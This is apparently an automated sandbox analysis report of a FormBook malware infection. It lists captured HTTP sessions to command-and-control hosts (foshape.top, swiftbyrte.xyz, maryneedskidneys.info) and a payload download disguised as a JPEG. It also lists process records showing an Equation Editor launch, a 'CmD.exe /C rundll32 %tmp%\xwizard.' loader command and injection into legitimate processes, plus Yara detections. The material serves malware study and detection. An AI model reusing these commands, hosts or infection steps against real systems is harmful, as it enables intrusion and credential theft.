                                                                                                Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_aFJzrTqZzOJ2ieM5Vdg9kjncfXjEx8N2nPImX3SfQiXAGEsSgr1X07woOsK12A7OUEuxcgBIJrws3+
                                                                                                Nov 11, 2024 10:04:53.286170006 CET | 1236 | IN
                                                                                                Data Ascii: 8z3Qtdog=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.danceonwater.net/px.js?ch=1"></script><script type="text/javascript" src="http://www.danceonwater.net/px.js?ch=2"></script><sc
                                                                                                Nov 11, 2024 10:04:53.286184072 CET | 424 | IN
                                                                                                Data Ascii: content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=de
                                                                                                Nov 11, 2024 10:04:53.286314964 CET | 713 | IN
                                                                                                Data Ascii: ite( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.location.host + '/' + 'Skenzor7' + '/park.js?reg_logo=netsol-logo.png&amp;reg_href_text=This+


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                6 | 192.168.2.22 | 49168 | 206.238.184.166 | 80 | 2184 | C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 10:04:58.721899986 CET | 2472 | OUT | POST /1pj2/ HTTP/1.1
                                                                                                Host: www.foshape.top
                                                                                                Accept: */*
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Origin: http://www.foshape.top
                                                                                                Referer: http://www.foshape.top/1pj2/
                                                                                                Content-Length: 2164
                                                                                                Cache-Control: no-cache
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
                                                                                                Nov 11, 2024 10:04:58.727087975 CET | 147 | OUT
                                                                                                Nov 11, 2024 10:04:59.499281883 CET | 398 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 09:04:59 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                Content-Encoding: gzip


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                7 | 192.168.2.22 | 49169 | 206.238.184.166 | 80 | 2184 | C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 10:05:01.254463911 CET | 658 | OUT | POST /1pj2/ HTTP/1.1
                                                                                                Host: www.foshape.top
                                                                                                Accept: */*
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Origin: http://www.foshape.top
                                                                                                Referer: http://www.foshape.top/1pj2/
                                                                                                Content-Length: 204
                                                                                                Cache-Control: no-cache
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
                                                                                                Nov 11, 2024 10:05:02.306224108 CET | 398 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 09:05:01 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                Content-Encoding: gzip


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                8 | 192.168.2.22 | 49170 | 206.238.184.166 | 80 | 2184 | C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 10:05:03.799254894 CET | 2472 | OUT | POST /1pj2/ HTTP/1.1
                                                                                                Host: www.foshape.top
                                                                                                Accept: */*
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Origin: http://www.foshape.top
                                                                                                Referer: http://www.foshape.top/1pj2/
                                                                                                Content-Length: 3628
                                                                                                Cache-Control: no-cache
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
                                                                                                Nov 11, 2024 10:05:03.804693937 CET | 1611 | OUT
                                                                                                Nov 11, 2024 10:05:04.599663973 CET | 398 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 09:05:04 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                Content-Encoding: gzip


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                9 | 192.168.2.22 | 49171 | 206.238.184.166 | 80 | 2184 | C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 10:05:06.342705011 CET | 407 | OUT | GET /1pj2/?S6g0i61=Q9HAAZkCTqKabe7K9gqmXFE+SKHCRVqPW1vmcslVAAVFIE4vmP8qeBByw9bQm+sf9dgpGu9sujYQB/6wq00OHtIuIS6zL5jH+2jz6veFJLP5dS32kbHd1AuYwep/&2Z94P=LzK44tdp_JPt28wP HTTP/1.1
                                                                                                Host: www.foshape.top
                                                                                                Accept: */*
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
                                                                                                Nov 11, 2024 10:05:07.134526968 CET | 410 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 09:05:06 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                Data Ascii: e9<script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"3JQY2e4DpZL0SSk5",ck:"3JQY2e4DpZL0SSk5"})</script><script>window.location.href ='https://bf102.slafwi.cn/38.html';</script>0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                10 | 192.168.2.22 | 49172 | 209.74.64.59 | 80 | 2184 | C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 10:05:12.416843891 CET | 2472 | OUT | POST /4nss/ HTTP/1.1
                                                                                                Host: www.swiftbyrte.xyz
                                                                                                Accept: */*
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Origin: http://www.swiftbyrte.xyz
                                                                                                Referer: http://www.swiftbyrte.xyz/4nss/
                                                                                                Content-Length: 2164
                                                                                                Cache-Control: no-cache
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
                                                                                                Nov 11, 2024 10:05:12.421905994 CET | 156 | OUT
                                                                                                Nov 11, 2024 10:05:12.951385021 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                Date: Mon, 11 Nov 2024 09:05:12 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                11 | 192.168.2.22 | 49173 | 209.74.64.59 | 80 | 2184 | C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 10:05:14.989640951 CET | 667 | OUT | POST /4nss/ HTTP/1.1
                                                                                                Host: www.swiftbyrte.xyz
                                                                                                Accept: */*
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Origin: http://www.swiftbyrte.xyz
                                                                                                Referer: http://www.swiftbyrte.xyz/4nss/
                                                                                                Content-Length: 204
                                                                                                Cache-Control: no-cache
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
                                                                                                Nov 11, 2024 10:05:15.531544924 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                Date: Mon, 11 Nov 2024 09:05:15 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                12 | 192.168.2.22 | 49174 | 209.74.64.59 | 80 | 2184 | C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 10:05:17.531440020 CET | 2472 | OUT | POST /4nss/ HTTP/1.1
                                                                                                Host: www.swiftbyrte.xyz
                                                                                                Accept: */*
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Origin: http://www.swiftbyrte.xyz
                                                                                                Referer: http://www.swiftbyrte.xyz/4nss/
                                                                                                Content-Length: 3628
                                                                                                Cache-Control: no-cache
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
                                                                                                Nov 11, 2024 10:05:17.536581993 CET | 1620 | OUT
                                                                                                Nov 11, 2024 10:05:18.071110010 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                Date: Mon, 11 Nov 2024 09:05:17 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                13 | 192.168.2.22 | 49175 | 209.74.64.59 | 80 | 2184 | C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 10:05:20.068116903 CET | 410 | OUT | GET /4nss/?S6g0i61=6+WoHn2deLk8NJlLXYXNnS+xy6y4IG2yMX4VldfHBIoEopHs/Hw0Y5um7kzlNPuKTbh4gzzb5ORm5rQz5MS/zlApmrlBhjwV83cLky4dFg4gLxZewVN2CP71ee4I&2Z94P=LzK44tdp_JPt28wP HTTP/1.1
                                                                                                Host: www.swiftbyrte.xyz
                                                                                                Accept: */*
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
                                                                                                Nov 11, 2024 10:05:20.660856009 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                Date: Mon, 11 Nov 2024 09:05:20 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                                                                                Nov 11, 2024 10:05:20.876156092 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                Date: Mon, 11 Nov 2024 09:05:20 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                14 | 192.168.2.22 | 49176 | 15.197.148.33 | 80 | 2184 | C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 10:05:26.088202953 CET | 2472 | OUT | POST /tqdg/ HTTP/1.1
                                                                                                Host: www.maryneedskidneys.info
                                                                                                Accept: */*
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Origin: http://www.maryneedskidneys.info
                                                                                                Referer: http://www.maryneedskidneys.info/tqdg/
                                                                                                Content-Length: 2164
                                                                                                Cache-Control: no-cache
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port
15 | 192.168.2.22 | 49177 | 15.197.148.33 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 10:05:28.929763079 CET | 688 | OUT | POST /tqdg/ HTTP/1.1
                                                                                                Host: www.maryneedskidneys.info
                                                                                                Accept: */*
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Origin: http://www.maryneedskidneys.info
                                                                                                Referer: http://www.maryneedskidneys.info/tqdg/
                                                                                                Content-Length: 204
                                                                                                Cache-Control: no-cache
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49161 | 153.121.40.91 | 443 | 3488 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 09:03:22 UTC | 227 | OUT | GET /~lizard581/cgi-bin/imageup/data/1424.jpg HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                                                Host: www.diced.jp
2024-11-11 09:03:23 UTC | 245 | IN | HTTP/1.1 200 OK
                                                                                                Date: Mon, 11 Nov 2024 09:03:23 GMT
                                                                                                Server: Apache
                                                                                                Last-Modified: Fri, 08 Nov 2024 18:13:09 GMT
                                                                                                ETag: "b61102-46200-6266ab40e2a20"
                                                                                                Accept-Ranges: bytes
                                                                                                Content-Length: 287232
                                                                                                Connection: close
                                                                                                Content-Type: image/jpeg



                                                                                                Target ID:1
                                                                                                Start time:04:03:16
                                                                                                Start date:11/11/2024
                                                                                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                                Imagebase:0x13f4e0000
                                                                                                File size:1'423'704 bytes
                                                                                                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:2
                                                                                                Start time:04:03:19
                                                                                                Start date:11/11/2024
                                                                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                Imagebase:0x400000
                                                                                                File size:543'304 bytes
                                                                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:3
                                                                                                Start time:04:03:20
                                                                                                Start date:11/11/2024
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:CmD.exe /C rundll32 %tmp%\xwizard.,IEX A C
                                                                                                Imagebase:0x4a1f0000
                                                                                                File size:302'592 bytes
                                                                                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:5
                                                                                                Start time:04:03:20
                                                                                                Start date:11/11/2024
                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:rundll32 C:\Users\user\AppData\Local\Temp\xwizard.,IEX A C
                                                                                                Imagebase:0x300000
                                                                                                File size:44'544 bytes
                                                                                                MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:6
                                                                                                Start time:04:03:20
                                                                                                Start date:11/11/2024
                                                                                                Path:C:\Windows\System32\rundll32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:rundll32 C:\Users\user\AppData\Local\Temp\xwizard.,IEX A C
                                                                                                Imagebase:0xfff20000
                                                                                                File size:45'568 bytes
                                                                                                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:9
                                                                                                Start time:04:03:26
                                                                                                Start date:11/11/2024
                                                                                                Path:C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
                                                                                                Imagebase:0xde0000
                                                                                                File size:92'936 bytes
                                                                                                MD5 hash:44131EEA626ABDBEF6631F72C007FC0E
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.497403170.00000000001E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.497567649.0000000002200000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:10
                                                                                                Start time:04:04:08
                                                                                                Start date:11/11/2024
                                                                                                Path:C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe"
                                                                                                Imagebase:0x1260000
                                                                                                File size:140'800 bytes
                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                Target ID:11
                                                                                                Start time:04:04:10
                                                                                                Start date:11/11/2024
                                                                                                Path:C:\Windows\SysWOW64\convert.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\SysWOW64\convert.exe"
                                                                                                Imagebase:0xa20000
                                                                                                File size:17'408 bytes
                                                                                                MD5 hash:FA5C490197C97EC58CF751F8CE6439D3
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.648541156.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.648550804.0000000000840000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.648308986.0000000000100000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:low
                                                                                                Has exited:false

                                                                                                Target ID:12
                                                                                                Start time:04:04:22
                                                                                                Start date:11/11/2024
                                                                                                Path:C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe"
                                                                                                Imagebase:0x1260000
                                                                                                File size:140'800 bytes
                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.648430732.00000000008F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                Target ID:17
                                                                                                Start time:04:04:37
                                                                                                Start date:11/11/2024
                                                                                                Path:C:\Program Files (x86)\Mozilla Firefox\firefox.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
                                                                                                Imagebase:0xf00000
                                                                                                File size:517'064 bytes
                                                                                                MD5 hash:C2D924CE9EA2EE3E7B7E6A7C476619CA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.553330249.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:1.7%
                                                                                                  Dynamic/Decrypted Code Coverage:3.9%
                                                                                                  Signature Coverage:11.7%
                                                                                                  Total number of Nodes:128
                                                                                                  Total number of Limit Nodes:8

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 81 42c563-42c59f call 4048f3 call 42d7b3 NtClose
                                                                                                  APIs
                                                                                                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C59A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Close
                                                                                                  • String ID:
                                                                                                  • API String ID: 3535843008-0
                                                                                                  • Opcode ID: d39154f4b1042c8076c574a901c09fb7df87b5706c8acd1970128f18ccb112a1
                                                                                                  • Instruction ID: 0270498e34e306ef69e75ccbf88dd0066c1dfa7ba39362fc1fefa573247f1674
                                                                                                  • Opcode Fuzzy Hash: d39154f4b1042c8076c574a901c09fb7df87b5706c8acd1970128f18ccb112a1
                                                                                                  • Instruction Fuzzy Hash: B3E046363002147BD620BAAAEC41F9B776CEFC5714F50842AFA48A7281C6B5B91587F5

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 95 8807ac-8807c1 LdrInitializeThunk
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                  • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                                                  • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                  • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
